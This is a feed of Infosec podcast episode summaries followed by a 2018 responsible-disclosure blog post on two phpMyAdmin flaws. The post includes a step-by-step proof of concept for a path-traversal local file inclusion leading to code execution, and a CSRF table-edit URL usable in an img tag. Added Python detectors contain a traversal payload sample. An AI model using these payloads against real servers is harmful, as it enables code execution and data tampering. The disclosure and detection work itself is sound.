How to Become a Security Architect | Guest Leighton Johnson

By: Infosec
26 July 2018 at 13:00

Learn about the life of a security architect in this discussion with Leighton Johnson, the CTO and founder of ISFMT (Information Security Forensics Management Team). Leighton discusses how you can become a security architect, the typical job responsibilities and common pitfalls you may face, certifications that can help advance your security architect career, how security architecture is evolving, and more.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

The $9 Billion BEC Threat You Can’t Ignore | Guests Roger Sels and Jack Koziol

By: Infosec
3 August 2018 at 11:00

Business email compromise (BEC) attacks are expected to cost businesses $9 billion by the end of 2018, according to Trend Micro estimates. In this discussion with Roger Sels, VP information security at DarkMatter, and Jack Koziol, CEO of Infosec Institute, you'll learn more about BEC attacks and measures you can take now to protect your organization. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

How to Become an Incident Responder | Guest Keatron Evans

By: Infosec
6 August 2018 at 11:00

Learn about the path to becoming an incident responder and what a potential career may entail in this discussion with Keatron Evans, Infosec Institute instructor and managing consultant at KM Cyber Security, LLC. Evans discusses his path to incident response, what kinds of interests can translate into a successful incident response career, and what a day in the life as an incident responder is like.

PMP Certification: Boost Your Career and Earn More Money | Guest Chris Danek

By: Infosec
10 August 2018 at 14:05

Earning your PMP certification can increase your earnings by as much as 20 percent. A Project Management Professional (PMP) certification proves to employers that you know what it takes to manage projects efficiently, within budget and on schedule. Infosec Institute instructor Chris Danek and sales manager Jarrod Mayes discuss how the PMP certification process works and how it can help build your credibility in any industry. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

The Problem with Passwords | Guest Susan Morrow

By: Infosec
13 August 2018 at 11:00

Passwords remain at the heart of many cybersecurity issues, and this week we take a deep dive into the topic with Susan Morrow, who has worked in numerous areas of the IT security industry since the early 1990s. Morrow discusses the new NIST password guidelines, how organizations are lagging behind, and a variety of other password-related topics. The InfoSec Institute security awareness series highlights the importance of security education across all levels of an organization.

Privacy Certifications Boosted by New Regulations | Guest Aaron Stevens

By: Infosec
17 August 2018 at 15:10

California’s new privacy law will affect more than half a million U.S. companies when it goes into effect on January 1, 2020, and that's just one piece of the evolving privacy landscape. In this discussion with IAPP channels manager Aaron Stevens, we discuss how organizations are being impacted by privacy regulations, the surging popularity of privacy certifications, and how an IAPP privacy certification can help boost your career.

How to Become a Computer Forensics Investigator | Guest Amber Schroader

By: Infosec
20 August 2018 at 11:00

Paraben CEO Amber Schroader discusses her path to becoming a computer forensics investigator and provides advice to those who may be considering computer forensics as a career. Schroader talks about the challenges of the field, the misconceptions and growth brought about by TV shows, and the fact that forensics is a science rather than an art.

CRISC Roadmap: The Highest-Paying Certification | Guest Leighton Johnson

By: Infosec
24 August 2018 at 11:00

Professionals with the Certified in Risk and Information Systems Control (CRISC) certification earn an average of $127,507 each year, making it the highest-paying IT certification available. Leighton Johnson, the CTO of Information Security Forensics Management Team and a CRISC-certified professional, discusses how earning your CRISC can open new career opportunities, as well as what the CRISC certification process is like. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

Post GDPR Best Practices | Guest Susan Morrow

By: Infosec
27 August 2018 at 14:44

It's been three months since the EU's General Data Protection Regulation (GDPR) went into effect. Returning guest Susan Morrow and host Chris Sienko take a look back at the initial rollout of GDPR, the compliance steps organizations have taken so far, and the potential future impact of GDPR.

How to Become a Network Admin | Guest Elias Papatestas

By: Infosec
1 September 2018 at 15:34

Learn about the path to becoming a network admin and what a potential career may entail in this discussion with Elias Papatestas, an Infosec Institute instructor who has extensive history in the IT industry dating back to the 1980s.

Cybersecurity Startups and Minority Representation | Guest Ron Gula

By: Infosec
8 September 2018 at 20:44

Ron Gula, president of Gula Tech Adventures and co-founder of Tenable Network Security, talks about the evolution of cybersecurity and security awareness, his career shift from the NSA to growing Tenable to funding other cybersecurity startups, and a variety of other topics.

Healthcare’s Many Cybersecurity Challenges | Guest Lisa Hedges

By: Infosec
16 September 2018 at 14:50

Lisa Hedges, content analyst at Software Advice, Gartner Digital Markets, talks about the many cybersecurity challenges facing the healthcare sector.

CISSP Exam Changes: Tips to Pass the New CAT Format (and Free E-book) | Guest Ken Magee

By: Infosec
25 September 2018 at 11:19

Learn everything you need to pass the new CISSP exam in this discussion with InfoSec Instructor Ken Magee.

Turn the Tables on Your Attackers with Deception Technology | Guest Carolyn Crandall

By: Infosec
28 September 2018 at 11:16

Chief deception officer Carolyn Crandall talks about using deception technology to trick attackers and protect organizations.

Defending Against and Recovering from Ransomware | Guest Bill Siegel

By: Infosec
5 October 2018 at 13:23

Bill Siegel, co-founder of ransomware-recovery company Coveware, discusses ransomware trends.

Midterm Elections, Hacking and Information Warfare | Guest John Dickson

By: Infosec
12 October 2018 at 10:00

John Dickson, Principal at Denim Group, talks about cybersecurity issues related to the upcoming midterm elections.

Get Started in Cybersecurity: Beginner Tips, Certifications and Career Paths | Guest Keatron Evans

By: Infosec
23 October 2018 at 12:39

Cybersecurity professional Keatron Evans shares tips for those looking to break into the industry or change careers.

New Phishing Trends, Old Tactics and Security Awareness | Guest Pedram Amini

By: Infosec
26 October 2018 at 13:54

Pedram Amini, creator of the Zero Day Initiative, talks about how phishing has changed, and stayed the same, over recent years.

How is Cybercrime Impacting the Financial Sector? | Guest Todd Weller

By: Infosec
3 November 2018 at 01:09

Todd Weller, chief strategy officer at Bandura Systems, discusses cybercrime in the financial sector and how to build a security awareness program on a budget.

Developing Security Champions within DevOps | Guest Ty Sbano

By: Infosec
9 November 2018 at 10:10

Ty Sbano, head of security at Periscope Data, talks about building Security Champions in the world of DevOps.

Securing the Internet-of-Things (IoT) | Guest Dr. Jared DeMott

By: Infosec
16 November 2018 at 12:25

Dr. Jared DeMott, CEO and founder of VDA Labs, chats about the security risks associated with the Internet of Things (IoT).

Transform Your Organization with a Security Champion | Guest Jeff Williams

By: Infosec
21 November 2018 at 10:00

OWASP co-founder Jeff Williams discusses how developing a Security Champion can make your organization more secure.

Are Third-Party Vendors Your Biggest Cybersecurity Risk? | Guest Fred Kneip

By: Infosec
30 November 2018 at 11:53

Fred Kneip, CEO of CyberGRX, discusses the growth of risk from third-party vendors.

Drilling Holes in ATMs, Card Skimming and Other Fraud | Guest Stan Engelbrecht

By: Infosec
7 December 2018 at 08:00

Stan Engelbrecht, director of cyber security practice for D3 Security, discusses ATM fraud.

10 Proven Security Awareness Tips From Osterman Research | Guest Michael Osterman

By: Infosec
10 December 2018 at 09:00

Michael Osterman, president and analyst at Osterman Research, shares security awareness tips and strategies.

PHPMyAdmin multiple vulnerabilities

By: blogscrt
14 December 2018 at 10:34

During an assignment, I found several serious vulnerabilities in phpMyAdmin, which is an application massively used to manage MariaDB and MySQL databases. One of them potentially leads to arbitrary code execution by exploiting a local file inclusion, while the other is a CSRF allowing any table entry to be edited.

1. Local file inclusion in transformation feature

The transformation feature of phpMyAdmin lets you define a specific display for some columns when selecting them from a table. For example, it can turn links stored as plain text into clickable links when rendering them.

Those transformations are defined in phpMyAdmin’s “column_info” system table, which usually resides in the phpmyadmin database. However, every database can ship its own version of the phpmyadmin system tables. To create the phpmyadmin system tables for a specific database, the following call can be used: http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*.
It will create a set of pma__* tables into your database.

Here is an example of how the transformation is applied, from tbl_replace.php:

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[...]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
    && !empty($mime_map[$column_name]['input_transformation'])
) {
    $filename = 'libraries/classes/Plugins/Transformations/'
        . $mime_map[$column_name]['input_transformation'];
    if (is_file($filename)) {
        include_once $filename;
        $classname = Transformations::getClassName($filename);
        /** @var IOTransformationsPlugin $transformation_plugin */
        $transformation_plugin = new $classname();
        $transformation_options = Transformations::getOptions(
            $mime_map[$column_name]['input_transformation_options']
        );
        $current_value = $transformation_plugin->applyTransformation(
            $current_value, $transformation_options
        );
        // check if transformation was successful or not
        // and accordingly set error messages & insert_fail
        if (method_exists($transformation_plugin, 'isSuccess')
            && !$transformation_plugin->isSuccess()
        ) {
            $insert_fail = true;
            $row_skipped = true;
            $insert_errors[] = sprintf(
                __('Row: %1$s, Column: %2$s, Error: %3$s'),
                $rownumber, $column_name,
                $transformation_plugin->getError()
            );
        }
    }
}

The transformation is fetched from the “pma__column_info” system table in the current database, or otherwise from the “phpmyadmin” database. The “input_transformation” column is used as a filename to include, and is vulnerable to a path traversal that leads to a local file inclusion.

Here is a PoC to exploit this vulnerability:

  1. Create a new database “foo” with a “bar” table containing a “baz” column, and insert a row whose value contains PHP code (this fills the session with some PHP code):
    CREATE DATABASE foo;
    CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
    INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
  2. Create the phpMyAdmin system tables in your database by calling http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
  3. Fill the transformation information with the path traversal in the “pma__column_info” table:
    INSERT INTO `pma__column_info` SELECT '1', 'foo', 'bar', 'baz', 'plop',
    'plop', 'plop', 'plop',
    '[path_traversal]/var/lib/php/sessions/sess_{yourSessionId}', 'plop';
  4. Browsing to http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 will trigger the phpinfo() call.
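The missing check, as an added example that is neither phpMyAdmin's code nor its actual fix: validate the "input_transformation" value as a plain plugin name before it becomes an include path, and run the same check as an audit over exported pma__column_info rows. PLUGIN_DIR, the allowed name pattern and the sample rows are assumptions for the example.

```python
import os
import re
from typing import Dict, List

# Added example, not phpMyAdmin's own code or its real patch: the validation
# tbl_replace.php needed before turning the "input_transformation" column into
# an include path, written in Python so it can also audit exported
# pma__column_info rows. PLUGIN_DIR is an assumed deployment path; only the
# directory name itself comes from the write-up.
PLUGIN_DIR = "/var/www/phpmyadmin/libraries/classes/Plugins/Transformations"

# Allow "Name.php" or "Subdir/Name.php": word characters only, so no "..",
# no absolute paths, no null bytes. Assumed layout; tighten to the real plugin
# list of the deployment if it is known.
SAFE_NAME = re.compile(r"^(?:[A-Za-z0-9_]+/)?[A-Za-z0-9_]+\.php$")


def is_safe_transformation(name: str, plugin_dir: str = PLUGIN_DIR) -> bool:
    """True only if `name` is a well-formed plugin name inside plugin_dir."""
    if not SAFE_NAME.fullmatch(name):
        return False
    # Defence in depth: resolve the joined path and confirm it still lies
    # under the plugin directory even if the file system contains symlinks.
    root = os.path.realpath(plugin_dir)
    target = os.path.realpath(os.path.join(root, name))
    return target != root and os.path.commonpath([root, target]) == root


def audit_column_info(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the rows whose input_transformation would fail the check."""
    return [row for row in rows
            if row.get("input_transformation")
            and not is_safe_transformation(row["input_transformation"])]


# Constructed sample rows mirroring pma__column_info: one benign plugin
# reference and one shaped like the traversal payload from the write-up.
SAMPLE_ROWS = [
    {"db_name": "shop", "table_name": "orders", "column_name": "client_ip",
     "input_transformation": "Input/Text_Plain_Iptolong.php"},
    {"db_name": "foo", "table_name": "bar", "column_name": "baz",
     "input_transformation": "../../../../../../var/lib/php/sessions/sess_abc123"},
]

if __name__ == "__main__":
    for row in audit_column_info(SAMPLE_ROWS):
        print(f"suspicious input_transformation on "
              f"{row['db_name']}.{row['table_name']}.{row['column_name']}: "
              f"{row['input_transformation']!r}")
```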

2. CSRF for updating data in table

This vulnerability is pretty easy to understand. A simple GET request can be used to update data in a table. Here is an example:

http://phpmyadmin/tbl_replace.php?db=*yourDB*&table=*yourTable*&fields_name[multi_edit][0][0]=*fieldToEdit*&fields[multi_edit][0][0]=*fieldNewValue*&clause_is_unique=1&where_clause=*whereClause*

A malicious user could force a logged-in user to update arbitrary tables in arbitrary DBs. This can also be used in a simple <img> element on forums or elsewhere, as the request is a simple GET one.
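Because phpMyAdmin's own forms submit tbl_replace.php by POST, a GET request carrying the edit parameters is something a defender can alert on in web server logs. The following is an added example, not part of the original post or of phpMyAdmin: it parses combined-format access log lines (constructed here, with placeholder hosts and addresses) and flags the pattern above; it also catches the GET used in the first PoC.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Added example, not part of the original write-up or of phpMyAdmin. Log
# format is the Apache/nginx "combined" format; sample lines are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Parameters that only belong in a state-changing form submission.
EDIT_PARAMS = ("fields[multi_edit]", "fields_name[multi_edit]", "where_clause")


def is_csrf_style_edit(method: str, target: str) -> bool:
    """True for a GET to tbl_replace.php that carries table-edit parameters."""
    parts = urlsplit(target)
    if method != "GET" or not parts.path.endswith("/tbl_replace.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    # parse_qs keeps the PHP array syntax in the key, e.g. fields[multi_edit][0][0]
    return any(key.startswith(EDIT_PARAMS) for key in params)


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client ip, referer, request target) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_csrf_style_edit(m["method"], m["target"]):
            hits.append((m["ip"], m["referer"], m["target"]))
    return hits


SAMPLE_LOG = [
    # Normal edit: POST, referer is phpMyAdmin itself.
    '192.0.2.10 - - [14/Dec/2018:10:31:02 +0100] "POST /phpmyadmin/tbl_replace.php HTTP/1.1" 200 4521 "http://pma.example/phpmyadmin/tbl_change.php" "Mozilla/5.0"',
    # Edit parameters in a GET, with a third-party page as referer (the <img> scenario).
    '192.0.2.10 - - [14/Dec/2018:10:32:40 +0100] "GET /phpmyadmin/tbl_replace.php?db=shop&table=users&fields_name[multi_edit][0][0]=role&fields[multi_edit][0][0]=admin&clause_is_unique=1&where_clause=id%3D7 HTTP/1.1" 200 310 "http://forum.example/thread/42" "Mozilla/5.0"',
    # Harmless GET to an unrelated phpMyAdmin script.
    '192.0.2.11 - - [14/Dec/2018:10:33:01 +0100] "GET /phpmyadmin/sql.php?db=shop&table=users HTTP/1.1" 200 8800 "http://pma.example/phpmyadmin/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, referer, target in scan_access_log(SAMPLE_LOG):
        print(f"{ip} referer={referer} -> {target}")
```

The referer is reported because an off-site referer on such a request is the strongest sign that the victim's browser was driven by another page.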

These vulnerabilities are both important. We responsibly disclosed them and they were patched in the newly released phpMyAdmin 4.8.4.

Timeline:

  • 2018.06.21 – Initial contact with phpMyAdmin security team.
  • 2018.06.24 – Initial response that the team will investigate.
  • 2018.08.02 – Request for news.
  • 2018.08.28 – Re-request for news.
  • 2018.08.31 – Response from phpMyAdmin team that they’re still in the process of fixing things.
  • 2018.11.01 – Request for news.
  • 2018.12.07 – Apologies from phpMyAdmin + explanation that a lot of code rewrite was necessary for multiple CSRF flaws.
  • 2018.12.11 – New version released with patch.

Update your things! 😉